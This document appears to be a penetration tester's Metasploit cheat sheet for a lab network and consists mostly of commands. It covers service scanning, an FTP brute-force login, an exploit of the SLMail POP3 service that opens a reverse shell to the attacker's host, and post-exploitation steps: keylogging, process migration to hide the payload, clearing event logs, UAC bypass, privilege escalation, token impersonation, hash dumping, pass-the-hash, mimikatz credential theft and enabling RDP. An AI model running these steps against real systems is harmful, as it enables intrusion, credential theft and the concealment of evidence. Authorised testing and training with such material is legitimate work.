Start: # msfconsole > show -h The show auxiliary command will display a long list of all the different auxiliarymodules in MSF which can be used for various tasks, such as information gathering(under the gather/ hierarchy), scanning and enumeration of various services (under thescanner/ hierarchy) and so on > show auxiliary To use any auxiliary module, exploit or plugin, issue the command use with the module name appended to it. You can then use the info command to get more information about thespecific module. > use auxiliary/scanner/snmp/snmp_enum > info Now we need to figure out how to use this auxiliary module. The show options command will display all the parameters required to run this module. > show options > set RHOSTS 10.11.1.1-254 We can also set theTHREADS count to 10 for faster scanning. > set THREADS 10 > show options > run Next is the SMB version scanner: > use auxiliary/scanner/smb/smb_version > show options > setg RHOSTS 10.11.1.1-254 > setg THREADS 10 > run WebDAV servers are often poorly configured and can often lead to a quick and easy shell on a victim. > use auxiliary/scanner/http/webdav_scanner > show options > run Various Metasploit auxiliary plugins include brute-force options in them, such as the example below of the ftp_login MSF module: # msfconsole -q msf> search type:auxiliary login msf> use auxiliary/scanner/ftp/ftp_login msf auxiliary(ftp_login) > show options msf auxiliary(ftp_login) > set PASS_FILE /root/password-file.txt msf auxiliary(ftp_login) > set USERPASS_FILE /root/users.txt msf auxiliary(ftp_login) > set RHOSTS 10.11.1.219 msf auxiliary(ftp_login) > run If the postgresql services is started ahead of time, the MSF will log findings and information about discovered hosts in a convenient, accessible database. To display all discovered hosts up to this point, we can give the hosts command within msfconsole. msf > hosts db_nmap MSF wrapper to scan hosts with Nmap and have the scan output inserted to the MSF database. > db_nmap > db_nmap 10.11.1.1-254 Once the db_nmap scan is complete, we can search the Metasploit database for machines with specific open ports by using the –p parameter. > services -p 443 Exploits: # msfconsole > search pop3 > use exploit/windows/pop3/seattlelab_pass > info > show options > set RHOST 10.11.1.35 > show payloads > set PAYLOAD windows/shell_reverse_tcp > show options > set LHOST 10.11.0.5 > exploit shell> windows/shell_reverse_tcp - Connect back to attacker and spawn a command shell windows/shell/reverse_tcp - Connect back to attacker, Spawn cmd shell (staged) Download or Upload with Meterpreter:

List/Run Meterpreter scripts: We can run scripts from within an msf session to do things like privesc and pillaging. //list all scripts meterpreter> run post/ <tab> //run the script meterpreter> run post/windows/gather/credentials/smartermail //there are a lot of gathering scripts we can use (enum_services, enum_applications, Migrate to processes: This will move our payload process into another place where its not as obvious. meterpreter> ps or meterpreter>gitpid <process> meterpreter> migrate <pid> //svchost is common or run post/windows/manage/migrate <pid> Key Logger: //Start meterpreter> keyscan_start //Dump after certain amount of time meterpreter> keyscan_dump //Stop meterpreter> keyscan_stop //clear logs, will depend on privs [DANGER]meterpreter> clearev Do Not do this unless allowed. If allowed in an engagement you should still back the logs up before deletion so they can be reviewed and restored if needed. MSF privesc: //Once we have a shell we can try an msf privesc autopwn which will try to escalate privs based off of what it sees. //windows Check for UAC msf> post/windows/gather/win_privs //Bypass UAC if needed msf> search bypassuac msf> use exploit/windows/local/<selection> msf> sessions msf> set session <> msf> exploit //autopwn msf> getsystem //we can also specify specific techniques with the -t flag //check your privs. You can keep trying getsystem to keep climbing privs if it is working but you are say admin rather than system. //*nix //Enum system msf> run post/linux/gather/enum_system //best thing we can do now is look for public exploits that fit the sysinfo and services. Get system does not work in nix so we have to pick the scripts at exploit/<os>/local Incognito: Is a powerful tool to switch between users without needing passwords. Token manipulation/passing. (I think we need system for this). Once we have a meterpreter shell. meterpreter> use incognito meterpreter> list_tokens -u meterpreter> impersonate_token <token> ex(note the double slash): els\\user meterpreter> getuid Unqoted service paths: look for and auto pwn service paths msf>use exploit/windows/local/trusted_service_path Hash Dump: //need admin or better meterpreter> run hashdup Pass the Hash: msf> use exploit/windows/smb/psexec //in the options set SMBPass=<hash> , SMBUser, and RHOST >run //we need to specify a payload so we open a session after the pass >sysinfo //in new session? //if we get a STATUS_ACCESS_DENIED then registry edits must be done to have this work.

Pass the Hash for RDP login: #xfreerdp /u:admin /d:foocorp /pth:<ntlmhash> /v:172.16.22.119 Mimikatz: Best loaded into a 64bit meterpreter process for full functionality. Very this with a "sysinfo" if we need to migrate then: meterpreter> ps -A x86_54 -s meterpreter> migrate <pid> meterpreter> sysinfo meterpreter> load mimikatz //search for creds meterpreter> wdigest WCE: Windows cred editor must first be uploaded then can be used to find creds. https://web.archive.org/web/20200414231958/http:/www.ampliasecurity.com/research/windows-credentials-editor/ meterpreter> execute -i -f wce.exe -a -h Switch from meterpreter to a sys native shell: meterpreter> shell Check running services: run service_manager -l or run post/windows/gather/enum_services Enable RDP service: > run getgui -e